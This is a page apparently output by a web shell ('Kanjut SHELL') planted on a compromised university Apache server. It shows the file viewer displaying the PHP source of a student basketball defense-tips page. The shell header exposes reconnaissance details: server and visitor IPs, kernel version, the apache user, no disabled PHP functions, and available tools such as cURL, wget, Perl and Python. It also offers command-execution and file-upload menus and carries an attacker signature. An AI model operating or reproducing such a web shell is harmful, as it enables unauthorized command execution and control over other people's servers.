Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.189.143.1
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/ranicholson/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/ranicholson/www/def.php
<!-- File name: def.php -->

<html>
<title>IN YOUR BAG</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Inconsolata">
<link rel="stylesheet" href="https://www.w3schools.com/lib/w3-theme-blue-grey.css">
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Open+Sans'>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

<style>
body, html {
    height: 100%;
    font-family: "Inconsolata", sans-serif;
}
.bgimg {
    background-position: center;
    background-repeat: repeat;
    background-image: url("http://www.tttbasketball.com/LOGO.jpg");
    min-height: 60%;
}
.menu {
    display: none;
}
</style>
<BODY>
<!-- Header with image -->
<header class="bgimg w3-display-container w3-grayscale-min" id="home">
  <div class="w3-display-middle w3-center">
    <span class="w3-tag" style="font-size:50px">IN YOUR BAG: TIPS</span>
  </div>
</header>

<!-- Add a background color and large text to the whole page -->
<div class="w3-sand w3-grayscale w3-large">

<!-- Links (sit on top) -->
        <div class="w1-top">
                 <div class="w3-row w3-padding w3-black">
                        <div class="w3-col s2">
                                <a href="iyb.php" class="w3-button w3-block w3-black">HOME</a>
                        </div>
			 <div class="w3-col s2">
                                <a href="iybfoot.php" class="w3-button w3-block w3-black">FOOTWEAR</a>
                        </div>
                        <div class="w3-col s2">
                                <a href="iybapp.php" class="w3-button w3-block w3-black">APPAREL</a>
  			</div>
                        <div class="w3-col s2">
                                <a href="iybeqmt.php" class="w3-button w3-block w3-black">EQUIPMENT</a>
                        </div>
                        <div class="w3-col s2">
                                <a href="iybtips.php" class="w3-button w3-block w3-black">TIPS</a>
                        </div>
			<a href="iyblogin.php" class="w3-bar-item w3-button w3-hide-small w3-right w3-padding-large w3-hover-white" title="Login"><i class="fa fa-user"></i></a>

                </div>
        </div>



<center>
<hr>                
<P>
<P>

               

<p><a href="def.php" class="w3-button w3-black w3-padding-large w3-large">DEFENSE</a></p>

<center>
<iframe width="500" height="400"                 
src="https://www.youtube.com/embed/GErH31bWJmk">
</iframe>
</center>

Kawahi Leonard, Gary Payton, Kevin Garnett, Ben Wallace &  Bill Russell             

<P>
<b><u>Several Tips that'll Improve Your Passing</u></b>     
<P>
<b>1. Keep your balance.</b>
<P>
If you lose your balacne you lose your position then you're ultimately beat. Try to be solid and don't 
go for fakes, don't lunge, and stay low. Taking short steps in a wide stance adds stability while on 
defense. 
<P>
<b>2. Trace the ball with your hand.</b>
<P>
Following the ball with your hand discourages your opponent from shooting because you have a higher chance
of challenging their shot attempt. 
<P>
<b>3.Keep your head lower then your opponent.</b>
<P>
Getting underneath the offensive player leads to good defensive postion allowing you to move quickly to
slide your feet or take a charge. 
<P>
<b>4. If the ball is above your oppenets head swipe up.</b> 
<P>
Most refs call fouls for swipping downward, placing your hands under the ball and flipping it up keeps
your oponent from bringing the ball down to shoot and produces more steals with less fouls. 
<P>
<b>5. Be aggressive but stay poised.</b>
<P>
Defense is full of aggression but too much of it can cause you to commit unnecessary fouls being too 
physical. It is important to keep your composure and find a balance of aggression, physicality, and
finesse to be a valuable defensive player that makes an impact.  

<p>

<!-- Defense-->
<center>
<iframe width="500" height="400"
src="https://www.youtube.com/embed/BIWDgYpjNas">
</iframe>
</center>


<H2><B><U>
ADDITIONAL TIPS
</U></B></H2>


<?php
        (include "defdisplay.php")
?>




<!------- bottom Bar--------->             
<p>
<div class= "w3-row w3-padding w3-black">

<div class="w3-col s3">
<a href="shoot.php" class="w3-button w3-black w3-padding-large w3-large">SHOOTING</a>
</div>

<div class="w3-col s3">    
<a href="pass.php" class="w3-button w3-black w3-padding-large w3-large">PASSING</a>
</div>

<div class="w3-col s3">
<a href="ballh.php" class="w3-button w3-black w3-padding-large w3-large">BALL HANDLING</a>
</div>

<div class="w3-col s3">
<a href="reb.php" class="w3-button w3-black w3-padding-large w3-large">REBOUNDING</a>
</div>


</div>
</center>
</body>




Stv3n404 - 2023